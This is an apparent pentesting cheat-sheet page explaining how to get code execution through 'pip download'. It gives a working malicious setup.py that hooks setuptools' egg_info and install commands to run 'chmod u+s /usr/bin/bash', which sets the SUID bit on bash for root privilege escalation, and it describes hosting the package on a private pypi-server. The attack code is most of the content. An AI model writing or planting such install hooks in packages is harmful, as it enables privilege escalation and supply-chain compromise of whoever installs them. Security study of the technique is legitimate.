search
Page cover

Pip Download Code Execution

Pip is a package management system written in Python. It can download custom Python package so we can create a malicious package to execute arbitrary code.

hashtag
Exploitationarrow-up-right

hashtag
1. Create Malicious Python Packagearrow-up-right

Reference: https://github.com/wunderwuzzi23/this_is_fine_wuzziarrow-up-right

Assume the package named "exploitpy". We need to create "setup.py" in the project root, and "init.py", "main.py" in src directory.

mkdir exploitpy
cd exploitpy
touch setup.py
mkdir src
touch src/__init__.py
echo 'print("hello")' > src/main.py
Copied!

Below is the content of the "setup.py". The arbitrary code is injected in the “RunCommand” method. It is executed when pip download command.

# setup.py
from setuptools import setup, find_packages
from setuptools.command.install import install
from setuptools.command.egg_info import egg_info

def RunCommand():
	# Arbitrary code here!
	import os;os.system("chmod u+s /usr/bin/bash")

class RunEggInfoCommand(egg_info):
    def run(self):
        RunCommand()
        egg_info.run(self)


class RunInstallCommand(install):
    def run(self):
        RunCommand()
        install.run(self)

setup(
    name = "exploitpy",
    version = "0.0.1",
    license = "MIT",
    packages=find_packages(),
    cmdclass={
        'install' : RunInstallCommand,
        'egg_info': RunEggInfoCommand
    },
)
Copied!

To package the project, run the following command in the project root.

It generates .tar.gz file in dist folder.

hashtag
2. Download the Packagearrow-up-right

We need to host the package using pypi-server.

Then download the package by the following command. If the pip command can be executed as root, we can also escalate privileges. When downloading, arbitrary code, that we specified in setup.py, will be executed.

hashtag
References

PreviousOpenSSL Privilege EscalationNextPolKit Privilege Escalation

Last updated